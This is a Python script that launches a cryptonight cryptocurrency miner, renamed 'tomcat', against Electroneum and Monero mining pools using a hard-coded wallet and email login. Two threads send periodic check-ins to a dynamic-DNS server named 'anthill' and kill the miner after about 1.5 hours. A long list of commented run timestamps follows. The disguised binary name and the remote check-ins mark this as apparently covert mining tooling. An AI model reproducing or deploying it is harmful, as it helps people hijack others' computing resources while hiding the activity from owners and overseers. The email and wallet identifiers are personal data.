import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:24:03.869351
#2018-02-17 16:12:03.370263
#2018-02-17 18:00:10.251063
#2018-02-17 19:47:03.549772
#2018-02-17 21:34:03.988768
#2018-02-17 23:18:04.188875
#2018-02-18 01:06:07.001702
#2018-02-18 02:53:05.192773
#2018-02-18 04:42:05.235015
#2018-02-18 06:34:07.477160
#2018-02-18 08:21:06.610354
#2018-02-18 10:09:03.670264
#2018-02-18 11:55:03.479788
#2018-02-18 13:40:05.528451
#2018-02-18 15:31:01.583178
#2018-02-18 17:19:01.394146
#2018-02-18 19:08:04.367333
#2018-02-18 20:54:01.714266
#2018-02-18 22:39:05.026992
#2018-02-19 00:28:02.164777
#2018-02-19 02:12:05.069609
#2018-02-19 03:58:07.701790
#2018-02-19 05:42:08.140586
#2018-02-19 07:30:09.633215
#2018-02-19 09:20:08.966733
#2018-02-19 11:10:06.880175
#2018-02-19 12:57:09.439939
#2018-02-19 14:44:01.800483
#2018-02-19 16:32:03.748493
#2018-02-19 18:19:06.416192
#2018-02-19 20:05:07.317033
#2018-02-19 21:57:04.047959
#2018-02-19 23:42:01.816991
#2018-02-20 01:28:06.731228
#2018-02-20 03:16:07.153452
#2018-02-20 05:02:04.497849
#2018-02-20 06:45:01.474160
#2018-02-20 08:31:04.872182
#2018-02-20 10:15:01.530058
#2018-02-20 11:59:05.565486
#2018-02-20 13:46:07.095106
#2018-02-20 15:31:06.767127
#2018-02-20 17:17:01.476595
#2018-02-20 19:08:08.601770
#2018-02-20 20:56:08.101449
#2018-02-20 22:41:05.851142
#2018-02-21 00:23:06.419994
#2018-02-21 02:09:05.577125
#2018-02-21 03:56:06.082093
#2018-02-21 05:45:04.259589
#2018-02-21 07:33:03.552009
#2018-02-21 09:18:06.134853
#2018-02-21 11:07:05.866561
#2018-02-21 12:53:06.361415
#2018-02-21 14:40:11.297445
#2018-02-21 16:26:08.801024
#2018-02-21 18:18:08.633169
#2018-02-21 20:03:06.472736
#2018-02-21 21:49:04.940908
#2018-02-21 23:35:09.867152
#2018-02-22 01:23:06.267377
#2018-02-22 03:11:01.659558
#2018-02-22 04:56:08.163022
#2018-02-22 06:41:06.837349
#2018-02-22 08:29:04.506036
#2018-02-22 10:16:03.955716
#2018-02-22 12:00:10.798994
#2018-02-22 13:45:08.305722
#2018-02-22 15:32:09.773093
#2018-02-22 17:18:08.949676
#2018-02-22 19:05:05.350970
#2018-02-22 20:57:04.754189
#2018-02-22 22:42:05.784429
#2018-02-23 00:28:05.012151
#2018-02-23 02:14:05.851475
#2018-02-23 04:03:07.118761
#2018-02-23 05:49:09.127030
#2018-02-23 07:38:06.262519
#2018-02-23 09:41:07.136338
#2018-02-23 11:46:07.047298
#2018-02-23 13:36:06.507163
#2018-02-23 15:23:06.337761
#2018-02-23 17:12:03.156565
#2018-02-23 18:57:06.373519
#2018-02-23 20:43:06.600178
#2018-02-23 22:28:06.814560
#2018-02-24 00:14:08.767325
#2018-02-24 02:06:01.704206
#2018-02-24 03:56:03.644962
#2018-02-24 05:42:07.659597
#2018-02-24 07:33:06.528126
#2018-02-24 09:19:03.976948
#2018-02-24 11:07:07.594880
#2018-02-24 12:55:08.161942
#2018-02-24 14:44:05.381267
#2018-02-24 16:36:02.214398
#2018-02-24 18:25:07.207293
#2018-02-24 20:11:05.403373
#2018-02-24 21:56:01.542611
#2018-02-25 02:35:09.170266
#2018-02-25 06:17:04.982516
#2018-02-25 11:40:08.813500